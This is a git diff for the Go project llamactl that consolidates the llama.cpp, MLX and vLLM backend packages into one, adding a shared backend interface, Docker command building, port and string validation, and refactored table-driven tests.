diff --git a/.gitignore b/.gitignore index cf813ce..4075d71 100644 --- a/.gitignore +++ b/.gitignore @@ -36,4 +36,10 @@ dist/ __pycache__/ -site/ \ No newline at end of file +site/ + +# Dev config +llamactl.dev.yaml + +# Debug files +__debug* \ No newline at end of file diff --git a/.vscode/launch.json b/.vscode/launch.json index cb01dbe..b45882e 100644 --- a/.vscode/launch.json +++ b/.vscode/launch.json @@ -12,7 +12,7 @@ "program": "${workspaceFolder}/cmd/server/main.go", "env": { "GO_ENV": "development", - "LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false" + "LLAMACTL_CONFIG_PATH": "${workspaceFolder}/llamactl.dev.yaml" }, } ] diff --git a/pkg/backends/backend.go b/pkg/backends/backend.go index 802fec2..ae22b1c 100644 --- a/pkg/backends/backend.go +++ b/pkg/backends/backend.go @@ -1,10 +1,251 @@ package backends +import ( + "encoding/json" + "fmt" + "llamactl/pkg/config" + "llamactl/pkg/validation" + "maps" +) + type BackendType string const ( BackendTypeLlamaCpp BackendType = "llama_cpp" BackendTypeMlxLm BackendType = "mlx_lm" BackendTypeVllm BackendType = "vllm" - // BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion ) + +type backend interface { + BuildCommandArgs() []string + BuildDockerArgs() []string + GetPort() int + SetPort(int) + GetHost() string + Validate() error +} + +var backendConstructors = map[BackendType]func() backend{ + BackendTypeLlamaCpp: func() backend { return &LlamaServerOptions{} }, + BackendTypeMlxLm: func() backend { return &MlxServerOptions{} }, + BackendTypeVllm: func() backend { return &VllmServerOptions{} }, +} + +type Options struct { + BackendType BackendType `json:"backend_type"` + BackendOptions map[string]any `json:"backend_options,omitempty"` + + // Backend-specific options + LlamaServerOptions *LlamaServerOptions `json:"-"` + MlxServerOptions *MlxServerOptions `json:"-"` + VllmServerOptions *VllmServerOptions `json:"-"` +} + +func (o *Options) UnmarshalJSON(data []byte) error { + type Alias Options + aux := &struct { + *Alias + }{ + Alias: (*Alias)(o), + } + + if err := json.Unmarshal(data, aux); err != nil { + return err + } + + // Create backend from constructor map + if o.BackendOptions != nil { + constructor, exists := backendConstructors[o.BackendType] + if !exists { + return fmt.Errorf("unsupported backend type: %s", o.BackendType) + } + + backend := constructor() + optionsData, err := json.Marshal(o.BackendOptions) + if err != nil { + return fmt.Errorf("failed to marshal backend options: %w", err) + } + + if err := json.Unmarshal(optionsData, backend); err != nil { + return fmt.Errorf("failed to unmarshal backend options: %w", err) + } + + // Store in the appropriate typed field for backward compatibility + o.setBackendOptions(backend) + } + + return nil +} + +func (o *Options) MarshalJSON() ([]byte, error) { + type Alias Options + aux := &struct { + *Alias + }{ + Alias: (*Alias)(o), + } + + // Get backend and marshal it + backend := o.getBackend() + if backend != nil { + optionsData, err := json.Marshal(backend) + if err != nil { + return nil, fmt.Errorf("failed to marshal backend options: %w", err) + } + if err := json.Unmarshal(optionsData, &aux.BackendOptions); err != nil { + return nil, fmt.Errorf("failed to unmarshal backend options to map: %w", err) + } + } + + return json.Marshal(aux) +} + +// setBackendOptions stores the backend in the appropriate typed field +func (o *Options) setBackendOptions(bcknd backend) { + switch v := bcknd.(type) { + case *LlamaServerOptions: + o.LlamaServerOptions = v + case *MlxServerOptions: + o.MlxServerOptions = v + case *VllmServerOptions: + o.VllmServerOptions = v + } +} + +func (o *Options) getBackendSettings(backendConfig *config.BackendConfig) *config.BackendSettings { + switch o.BackendType { + case BackendTypeLlamaCpp: + return &backendConfig.LlamaCpp + case BackendTypeMlxLm: + return &backendConfig.MLX + case BackendTypeVllm: + return &backendConfig.VLLM + default: + return nil + } +} + +// getBackend returns the actual backend implementation +func (o *Options) getBackend() backend { + switch o.BackendType { + case BackendTypeLlamaCpp: + return o.LlamaServerOptions + case BackendTypeMlxLm: + return o.MlxServerOptions + case BackendTypeVllm: + return o.VllmServerOptions + default: + return nil + } +} + +func (o *Options) isDockerEnabled(backend *config.BackendSettings) bool { + if backend.Docker != nil && backend.Docker.Enabled && o.BackendType != BackendTypeMlxLm { + return true + } + return false +} + +func (o *Options) IsDockerEnabled(backendConfig *config.BackendConfig) bool { + backendSettings := o.getBackendSettings(backendConfig) + return o.isDockerEnabled(backendSettings) +} + +// GetCommand builds the command to run the backend +func (o *Options) GetCommand(backendConfig *config.BackendConfig) string { + + backendSettings := o.getBackendSettings(backendConfig) + + if o.isDockerEnabled(backendSettings) { + return "docker" + } + + return backendSettings.Command +} + +// buildCommandArgs builds command line arguments for the backend +func (o *Options) BuildCommandArgs(backendConfig *config.BackendConfig) []string { + + var args []string + + backendSettings := o.getBackendSettings(backendConfig) + backend := o.getBackend() + if backend == nil { + return args + } + + if o.isDockerEnabled(backendSettings) { + // For Docker, start with Docker args + args = append(args, backendSettings.Docker.Args...) + args = append(args, backendSettings.Docker.Image) + args = append(args, backend.BuildDockerArgs()...) + + } else { + // For native execution, start with backend args + args = append(args, backendSettings.Args...) + args = append(args, backend.BuildCommandArgs()...) + } + + return args +} + +// BuildEnvironment builds the environment variables for the backend process +func (o *Options) BuildEnvironment(backendConfig *config.BackendConfig, environment map[string]string) map[string]string { + + backendSettings := o.getBackendSettings(backendConfig) + env := map[string]string{} + + if backendSettings.Environment != nil { + maps.Copy(env, backendSettings.Environment) + } + + if o.isDockerEnabled(backendSettings) { + if backendSettings.Docker.Environment != nil { + maps.Copy(env, backendSettings.Docker.Environment) + } + } + + if environment != nil { + maps.Copy(env, environment) + } + + return env +} + +func (o *Options) GetPort() int { + backend := o.getBackend() + if backend != nil { + return backend.GetPort() + } + return 0 +} + +func (o *Options) SetPort(port int) { + backend := o.getBackend() + if backend != nil { + backend.SetPort(port) + } +} + +func (o *Options) GetHost() string { + backend := o.getBackend() + if backend != nil { + return backend.GetHost() + } + return "localhost" +} + +func (o *Options) GetResponseHeaders(backendConfig *config.BackendConfig) map[string]string { + backendSettings := o.getBackendSettings(backendConfig) + return backendSettings.ResponseHeaders +} + +// ValidateInstanceOptions performs validation based on backend type +func (o *Options) ValidateInstanceOptions() error { + backend := o.getBackend() + if backend == nil { + return validation.ValidationError(fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType)) + } + + return backend.Validate() +} diff --git a/pkg/backends/llamacpp/llama.go b/pkg/backends/llama.go similarity index 93% rename from pkg/backends/llamacpp/llama.go rename to pkg/backends/llama.go index bca29e8..dc07457 100644 --- a/pkg/backends/llamacpp/llama.go +++ b/pkg/backends/llama.go @@ -1,15 +1,16 @@ -package llamacpp +package backends import ( "encoding/json" - "llamactl/pkg/backends" + "fmt" + "llamactl/pkg/validation" "reflect" "strconv" ) -// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated +// llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated // Used for both parsing (with underscores) and building (with dashes) -var multiValuedFlags = map[string]bool{ +var llamaMultiValuedFlags = map[string]bool{ // Parsing keys (with underscores) "override_tensor": true, "override_kv": true, @@ -335,11 +336,41 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error { return nil } +func (o *LlamaServerOptions) GetPort() int { + return o.Port +} + +func (o *LlamaServerOptions) SetPort(port int) { + o.Port = port +} + +func (o *LlamaServerOptions) GetHost() string { + return o.Host +} + +func (o *LlamaServerOptions) Validate() error { + if o == nil { + return validation.ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend")) + } + + // Use reflection to check all string fields for injection patterns + if err := validation.ValidateStructStrings(o, ""); err != nil { + return err + } + + // Basic network validation for port + if o.Port < 0 || o.Port > 65535 { + return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port)) + } + + return nil +} + // BuildCommandArgs converts InstanceOptions to command line arguments func (o *LlamaServerOptions) BuildCommandArgs() []string { // Llama uses multiple flags for arrays by default (not comma-separated) - // Use package-level multiValuedFlags variable - return backends.BuildCommandArgs(o, multiValuedFlags) + // Use package-level llamaMultiValuedFlags variable + return BuildCommandArgs(o, llamaMultiValuedFlags) } func (o *LlamaServerOptions) BuildDockerArgs() []string { @@ -356,10 +387,10 @@ func (o *LlamaServerOptions) BuildDockerArgs() []string { func ParseLlamaCommand(command string) (*LlamaServerOptions, error) { executableNames := []string{"llama-server"} var subcommandNames []string // Llama has no subcommands - // Use package-level multiValuedFlags variable + // Use package-level llamaMultiValuedFlags variable var llamaOptions LlamaServerOptions - if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil { + if err := ParseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil { return nil, err } diff --git a/pkg/backends/llamacpp/llama_test.go b/pkg/backends/llama_test.go similarity index 61% rename from pkg/backends/llamacpp/llama_test.go rename to pkg/backends/llama_test.go index c779320..c05a3a5 100644 --- a/pkg/backends/llamacpp/llama_test.go +++ b/pkg/backends/llama_test.go @@ -1,71 +1,38 @@ -package llamacpp_test +package backends_test import ( "encoding/json" "fmt" - "llamactl/pkg/backends/llamacpp" + "llamactl/pkg/backends" + "llamactl/pkg/testutil" "reflect" - "slices" "testing" ) -func TestBuildCommandArgs_BasicFields(t *testing.T) { - options := llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, - Host: "localhost", - Verbose: true, - CtxSize: 4096, - GPULayers: 32, - } - - args := options.BuildCommandArgs() - - // Check individual arguments - expectedPairs := map[string]string{ - "--model": "/path/to/model.gguf", - "--port": "8080", - "--host": "localhost", - "--ctx-size": "4096", - "--gpu-layers": "32", - } - - for flag, expectedValue := range expectedPairs { - if !containsFlagWithValue(args, flag, expectedValue) { - t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args) - } - } - - // Check standalone boolean flag - if !contains(args, "--verbose") { - t.Errorf("Expected --verbose flag not found in %v", args) - } -} - -func TestBuildCommandArgs_BooleanFields(t *testing.T) { +func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) { tests := []struct { name string - options llamacpp.LlamaServerOptions + options backends.LlamaServerOptions expected []string excluded []string }{ { name: "verbose true", - options: llamacpp.LlamaServerOptions{ + options: backends.LlamaServerOptions{ Verbose: true, }, expected: []string{"--verbose"}, }, { name: "verbose false", - options: llamacpp.LlamaServerOptions{ + options: backends.LlamaServerOptions{ Verbose: false, }, excluded: []string{"--verbose"}, }, { name: "multiple booleans", - options: llamacpp.LlamaServerOptions{ + options: backends.LlamaServerOptions{ Verbose: true, FlashAttn: true, Mlock: false, @@ -81,13 +48,13 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) { args := tt.options.BuildCommandArgs() for _, expectedArg := range tt.expected { - if !contains(args, expectedArg) { + if !testutil.Contains(args, expectedArg) { t.Errorf("Expected argument %q not found in %v", expectedArg, args) } } for _, excludedArg := range tt.excluded { - if contains(args, excludedArg) { + if testutil.Contains(args, excludedArg) { t.Errorf("Excluded argument %q found in %v", excludedArg, args) } } @@ -95,38 +62,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) { } } -func TestBuildCommandArgs_NumericFields(t *testing.T) { - options := llamacpp.LlamaServerOptions{ - Port: 8080, - Threads: 4, - CtxSize: 2048, - GPULayers: 16, - Temperature: 0.7, - TopK: 40, - TopP: 0.9, - } - - args := options.BuildCommandArgs() - - expectedPairs := map[string]string{ - "--port": "8080", - "--threads": "4", - "--ctx-size": "2048", - "--gpu-layers": "16", - "--temp": "0.7", - "--top-k": "40", - "--top-p": "0.9", - } - - for flag, expectedValue := range expectedPairs { - if !containsFlagWithValue(args, flag, expectedValue) { - t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args) - } - } -} - -func TestBuildCommandArgs_ZeroValues(t *testing.T) { - options := llamacpp.LlamaServerOptions{ +func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) { + options := backends.LlamaServerOptions{ Port: 0, // Should be excluded Threads: 0, // Should be excluded Temperature: 0, // Should be excluded @@ -146,14 +83,14 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) { } for _, excludedArg := range excludedArgs { - if contains(args, excludedArg) { + if testutil.Contains(args, excludedArg) { t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args) } } } -func TestBuildCommandArgs_ArrayFields(t *testing.T) { - options := llamacpp.LlamaServerOptions{ +func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) { + options := backends.LlamaServerOptions{ Lora: []string{"adapter1.bin", "adapter2.bin"}, OverrideTensor: []string{"tensor1", "tensor2", "tensor3"}, DrySequenceBreaker: []string{".", "!", "?"}, @@ -170,15 +107,15 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) { for flag, values := range expectedOccurrences { for _, value := range values { - if !containsFlagWithValue(args, flag, value) { + if !testutil.ContainsFlagWithValue(args, flag, value) { t.Errorf("Expected %s %s, not found in %v", flag, value, args) } } } } -func TestBuildCommandArgs_EmptyArrays(t *testing.T) { - options := llamacpp.LlamaServerOptions{ +func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) { + options := backends.LlamaServerOptions{ Lora: []string{}, // Empty array should not generate args OverrideTensor: []string{}, // Empty array should not generate args } @@ -187,43 +124,13 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) { excludedArgs := []string{"--lora", "--override-tensor"} for _, excludedArg := range excludedArgs { - if contains(args, excludedArg) { + if testutil.Contains(args, excludedArg) { t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args) } } } -func TestBuildCommandArgs_FieldNameConversion(t *testing.T) { - // Test snake_case to kebab-case conversion - options := llamacpp.LlamaServerOptions{ - CtxSize: 4096, - GPULayers: 32, - ThreadsBatch: 2, - FlashAttn: true, - TopK: 40, - TopP: 0.9, - } - - args := options.BuildCommandArgs() - - // Check that field names are properly converted - expectedFlags := []string{ - "--ctx-size", // ctx_size -> ctx-size - "--gpu-layers", // gpu_layers -> gpu-layers - "--threads-batch", // threads_batch -> threads-batch - "--flash-attn", // flash_attn -> flash-attn - "--top-k", // top_k -> top-k - "--top-p", // top_p -> top-p - } - - for _, flag := range expectedFlags { - if !contains(args, flag) { - t.Errorf("Expected flag %q not found in %v", flag, args) - } - } -} - -func TestUnmarshalJSON_StandardFields(t *testing.T) { +func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) { jsonData := `{ "model": "/path/to/model.gguf", "port": 8080, @@ -234,7 +141,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) { "temp": 0.7 }` - var options llamacpp.LlamaServerOptions + var options backends.LlamaServerOptions err := json.Unmarshal([]byte(jsonData), &options) if err != nil { t.Fatalf("Unmarshal failed: %v", err) @@ -263,16 +170,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) { } } -func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) { +func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) { tests := []struct { name string jsonData string - checkFn func(llamacpp.LlamaServerOptions) error + checkFn func(backends.LlamaServerOptions) error }{ { name: "threads alternatives", jsonData: `{"t": 4, "tb": 2}`, - checkFn: func(opts llamacpp.LlamaServerOptions) error { + checkFn: func(opts backends.LlamaServerOptions) error { if opts.Threads != 4 { return fmt.Errorf("expected threads 4, got %d", opts.Threads) } @@ -285,7 +192,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) { { name: "context size alternatives", jsonData: `{"c": 2048}`, - checkFn: func(opts llamacpp.LlamaServerOptions) error { + checkFn: func(opts backends.LlamaServerOptions) error { if opts.CtxSize != 2048 { return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize) } @@ -295,7 +202,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) { { name: "gpu layers alternatives", jsonData: `{"ngl": 16}`, - checkFn: func(opts llamacpp.LlamaServerOptions) error { + checkFn: func(opts backends.LlamaServerOptions) error { if opts.GPULayers != 16 { return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers) } @@ -305,7 +212,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) { { name: "model alternatives", jsonData: `{"m": "/path/model.gguf"}`, - checkFn: func(opts llamacpp.LlamaServerOptions) error { + checkFn: func(opts backends.LlamaServerOptions) error { if opts.Model != "/path/model.gguf" { return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model) } @@ -315,7 +222,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) { { name: "temperature alternatives", jsonData: `{"temp": 0.8}`, - checkFn: func(opts llamacpp.LlamaServerOptions) error { + checkFn: func(opts backends.LlamaServerOptions) error { if opts.Temperature != 0.8 { return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature) } @@ -326,7 +233,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { - var options llamacpp.LlamaServerOptions + var options backends.LlamaServerOptions err := json.Unmarshal([]byte(tt.jsonData), &options) if err != nil { t.Fatalf("Unmarshal failed: %v", err) @@ -339,24 +246,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) { } } -func TestUnmarshalJSON_InvalidJSON(t *testing.T) { +func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) { invalidJSON := `{"port": "not-a-number", "invalid": syntax}` - var options llamacpp.LlamaServerOptions + var options backends.LlamaServerOptions err := json.Unmarshal([]byte(invalidJSON), &options) if err == nil { t.Error("Expected error for invalid JSON") } } -func TestUnmarshalJSON_ArrayFields(t *testing.T) { +func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) { jsonData := `{ "lora": ["adapter1.bin", "adapter2.bin"], "override_tensor": ["tensor1", "tensor2"], "dry_sequence_breaker": [".", "!", "?"] }` - var options llamacpp.LlamaServerOptions + var options backends.LlamaServerOptions err := json.Unmarshal([]byte(jsonData), &options) if err != nil { t.Fatalf("Unmarshal failed: %v", err) @@ -383,26 +290,81 @@ func TestParseLlamaCommand(t *testing.T) { name string command string expectErr bool + validate func(*testing.T, *backends.LlamaServerOptions) }{ { name: "basic command", command: "llama-server --model /path/to/model.gguf --gpu-layers 32", expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.Model != "/path/to/model.gguf" { + t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model) + } + if opts.GPULayers != 32 { + t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers) + } + }, }, { name: "args only", command: "--model /path/to/model.gguf --ctx-size 4096", expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.Model != "/path/to/model.gguf" { + t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model) + } + if opts.CtxSize != 4096 { + t.Errorf("expected ctx_size 4096, got %d", opts.CtxSize) + } + }, }, { name: "mixed flag formats", command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose", expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.Model != "/path/model.gguf" { + t.Errorf("expected model '/path/model.gguf', got '%s'", opts.Model) + } + if opts.GPULayers != 16 { + t.Errorf("expected gpu_layers 16, got %d", opts.GPULayers) + } + if !opts.Verbose { + t.Errorf("expected verbose to be true") + } + }, }, { name: "quoted strings", command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`, expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.APIKey != "sk-1234567890abcdef" { + t.Errorf("expected api_key 'sk-1234567890abcdef', got '%s'", opts.APIKey) + } + }, + }, + { + name: "multiple value types", + command: "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap", + expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.Model != "/test/model.gguf" { + t.Errorf("expected model '/test/model.gguf', got '%s'", opts.Model) + } + if opts.GPULayers != 32 { + t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers) + } + if opts.Temperature != 0.7 { + t.Errorf("expected temperature 0.7, got %f", opts.Temperature) + } + if !opts.Verbose { + t.Errorf("expected verbose to be true") + } + if !opts.NoMmap { + t.Errorf("expected no_mmap to be true") + } + }, }, { name: "empty command", @@ -423,7 +385,7 @@ func TestParseLlamaCommand(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { - result, err := llamacpp.ParseLlamaCommand(tt.command) + result, err := backends.ParseLlamaCommand(tt.command) if tt.expectErr { if err == nil { @@ -439,43 +401,19 @@ func TestParseLlamaCommand(t *testing.T) { if result == nil { t.Errorf("expected result but got nil") + return + } + + if tt.validate != nil { + tt.validate(t, result) } }) } } -func TestParseLlamaCommandValues(t *testing.T) { - command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap" - result, err := llamacpp.ParseLlamaCommand(command) - - if err != nil { - t.Fatalf("unexpected error: %v", err) - } - - if result.Model != "/test/model.gguf" { - t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model) - } - - if result.GPULayers != 32 { - t.Errorf("expected gpu_layers 32, got %d", result.GPULayers) - } - - if result.Temperature != 0.7 { - t.Errorf("expected temperature 0.7, got %f", result.Temperature) - } - - if !result.Verbose { - t.Errorf("expected verbose to be true") - } - - if !result.NoMmap { - t.Errorf("expected no_mmap to be true") - } -} - func TestParseLlamaCommandArrays(t *testing.T) { command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin" - result, err := llamacpp.ParseLlamaCommand(command) + result, err := backends.ParseLlamaCommand(command) if err != nil { t.Fatalf("unexpected error: %v", err) @@ -491,21 +429,4 @@ func TestParseLlamaCommandArrays(t *testing.T) { t.Errorf("expected lora[%d]=%s got %s", i, v, result.Lora[i]) } } -} - -// Helper functions -func contains(slice []string, item string) bool { - return slices.Contains(slice, item) -} - -func containsFlagWithValue(args []string, flag, value string) bool { - for i, arg := range args { - if arg == flag { - // Check if there's a next argument and it matches the expected value - if i+1 < len(args) && args[i+1] == value { - return true - } - } - } - return false -} +} \ No newline at end of file diff --git a/pkg/backends/mlx/mlx.go b/pkg/backends/mlx.go similarity index 67% rename from pkg/backends/mlx/mlx.go rename to pkg/backends/mlx.go index 3b83681..d0ec602 100644 --- a/pkg/backends/mlx/mlx.go +++ b/pkg/backends/mlx.go @@ -1,7 +1,8 @@ -package mlx +package backends import ( - "llamactl/pkg/backends" + "fmt" + "llamactl/pkg/validation" ) type MlxServerOptions struct { @@ -30,10 +31,43 @@ type MlxServerOptions struct { MaxTokens int `json:"max_tokens,omitempty"` } +func (o *MlxServerOptions) GetPort() int { + return o.Port +} + +func (o *MlxServerOptions) SetPort(port int) { + o.Port = port +} + +func (o *MlxServerOptions) GetHost() string { + return o.Host +} + +func (o *MlxServerOptions) Validate() error { + if o == nil { + return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend")) + } + + if err := validation.ValidateStructStrings(o, ""); err != nil { + return err + } + + // Basic network validation for port + if o.Port < 0 || o.Port > 65535 { + return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port)) + } + + return nil +} + // BuildCommandArgs converts to command line arguments func (o *MlxServerOptions) BuildCommandArgs() []string { multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields - return backends.BuildCommandArgs(o, multipleFlags) + return BuildCommandArgs(o, multipleFlags) +} + +func (o *MlxServerOptions) BuildDockerArgs() []string { + return []string{} } // ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions @@ -48,7 +82,7 @@ func ParseMlxCommand(command string) (*MlxServerOptions, error) { multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags var mlxOptions MlxServerOptions - if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil { + if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil { return nil, err } diff --git a/pkg/backends/mlx/mlx_test.go b/pkg/backends/mlx/mlx_test.go deleted file mode 100644 index 8baeb5c..0000000 --- a/pkg/backends/mlx/mlx_test.go +++ /dev/null @@ -1,157 +0,0 @@ -package mlx_test - -import ( - "llamactl/pkg/backends/mlx" - "testing" -) - -func TestParseMlxCommand(t *testing.T) { - tests := []struct { - name string - command string - expectErr bool - }{ - { - name: "basic command", - command: "mlx_lm.server --model /path/to/model --host 0.0.0.0", - expectErr: false, - }, - { - name: "args only", - command: "--model /path/to/model --port 8080", - expectErr: false, - }, - { - name: "mixed flag formats", - command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code", - expectErr: false, - }, - { - name: "quoted strings", - command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`, - expectErr: false, - }, - { - name: "empty command", - command: "", - expectErr: true, - }, - { - name: "unterminated quote", - command: `mlx_lm.server --model test.mlx --chat-template "unterminated`, - expectErr: true, - }, - { - name: "malformed flag", - command: "mlx_lm.server ---model test.mlx", - expectErr: true, - }, - } - - for _, tt := range tests { - t.Run(tt.name, func(t *testing.T) { - result, err := mlx.ParseMlxCommand(tt.command) - - if tt.expectErr { - if err == nil { - t.Errorf("expected error but got none") - } - return - } - - if err != nil { - t.Errorf("unexpected error: %v", err) - return - } - - if result == nil { - t.Errorf("expected result but got nil") - } - }) - } -} - -func TestParseMlxCommandValues(t *testing.T) { - command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG" - result, err := mlx.ParseMlxCommand(command) - - if err != nil { - t.Fatalf("unexpected error: %v", err) - } - - if result.Model != "/test/model.mlx" { - t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model) - } - - if result.Port != 8080 { - t.Errorf("expected port 8080, got %d", result.Port) - } - - if result.Temp != 0.7 { - t.Errorf("expected temp 0.7, got %f", result.Temp) - } - - if !result.TrustRemoteCode { - t.Errorf("expected trust_remote_code to be true") - } - - if result.LogLevel != "DEBUG" { - t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel) - } -} - -func TestBuildCommandArgs(t *testing.T) { - options := &mlx.MlxServerOptions{ - Model: "/test/model.mlx", - Host: "127.0.0.1", - Port: 8080, - Temp: 0.7, - TopP: 0.9, - TopK: 40, - MaxTokens: 2048, - TrustRemoteCode: true, - LogLevel: "DEBUG", - ChatTemplate: "custom template", - } - - args := options.BuildCommandArgs() - - // Check that all expected flags are present - expectedFlags := map[string]string{ - "--model": "/test/model.mlx", - "--host": "127.0.0.1", - "--port": "8080", - "--log-level": "DEBUG", - "--chat-template": "custom template", - "--temp": "0.7", - "--top-p": "0.9", - "--top-k": "40", - "--max-tokens": "2048", - } - - for i := 0; i < len(args); i++ { - if args[i] == "--trust-remote-code" { - continue // Boolean flag with no value - } - if args[i] == "--use-default-chat-template" { - continue // Boolean flag with no value - } - - if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) { - if args[i+1] != expectedValue { - t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1]) - } - } - } - - // Check boolean flags - foundTrustRemoteCode := false - for _, arg := range args { - if arg == "--trust-remote-code" { - foundTrustRemoteCode = true - } - } - if !foundTrustRemoteCode { - t.Errorf("expected --trust-remote-code flag to be present") - } -} diff --git a/pkg/backends/mlx_test.go b/pkg/backends/mlx_test.go new file mode 100644 index 0000000..0194551 --- /dev/null +++ b/pkg/backends/mlx_test.go @@ -0,0 +1,202 @@ +package backends_test + +import ( + "llamactl/pkg/backends" + "llamactl/pkg/testutil" + "testing" +) + +func TestParseMlxCommand(t *testing.T) { + tests := []struct { + name string + command string + expectErr bool + validate func(*testing.T, *backends.MlxServerOptions) + }{ + { + name: "basic command", + command: "mlx_lm.server --model /path/to/model --host 0.0.0.0", + expectErr: false, + validate: func(t *testing.T, opts *backends.MlxServerOptions) { + if opts.Model != "/path/to/model" { + t.Errorf("expected model '/path/to/model', got '%s'", opts.Model) + } + if opts.Host != "0.0.0.0" { + t.Errorf("expected host '0.0.0.0', got '%s'", opts.Host) + } + }, + }, + { + name: "args only", + command: "--model /path/to/model --port 8080", + expectErr: false, + validate: func(t *testing.T, opts *backends.MlxServerOptions) { + if opts.Model != "/path/to/model" { + t.Errorf("expected model '/path/to/model', got '%s'", opts.Model) + } + if opts.Port != 8080 { + t.Errorf("expected port 8080, got %d", opts.Port) + } + }, + }, + { + name: "mixed flag formats", + command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code", + expectErr: false, + validate: func(t *testing.T, opts *backends.MlxServerOptions) { + if opts.Model != "/path/model" { + t.Errorf("expected model '/path/model', got '%s'", opts.Model) + } + if opts.Temp != 0.7 { + t.Errorf("expected temp 0.7, got %f", opts.Temp) + } + if !opts.TrustRemoteCode { + t.Errorf("expected trust_remote_code to be true") + } + }, + }, + { + name: "multiple value types", + command: "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG", + expectErr: false, + validate: func(t *testing.T, opts *backends.MlxServerOptions) { + if opts.Model != "/test/model.mlx" { + t.Errorf("expected model '/test/model.mlx', got '%s'", opts.Model) + } + if opts.Port != 8080 { + t.Errorf("expected port 8080, got %d", opts.Port) + } + if opts.Temp != 0.7 { + t.Errorf("expected temp 0.7, got %f", opts.Temp) + } + if !opts.TrustRemoteCode { + t.Errorf("expected trust_remote_code to be true") + } + if opts.LogLevel != "DEBUG" { + t.Errorf("expected log_level 'DEBUG', got '%s'", opts.LogLevel) + } + }, + }, + { + name: "empty command", + command: "", + expectErr: true, + }, + { + name: "unterminated quote", + command: `mlx_lm.server --model test.mlx --chat-template "unterminated`, + expectErr: true, + }, + { + name: "malformed flag", + command: "mlx_lm.server ---model test.mlx", + expectErr: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result, err := backends.ParseMlxCommand(tt.command) + + if tt.expectErr { + if err == nil { + t.Errorf("expected error but got none") + } + return + } + + if err != nil { + t.Errorf("unexpected error: %v", err) + return + } + + if result == nil { + t.Errorf("expected result but got nil") + return + } + + if tt.validate 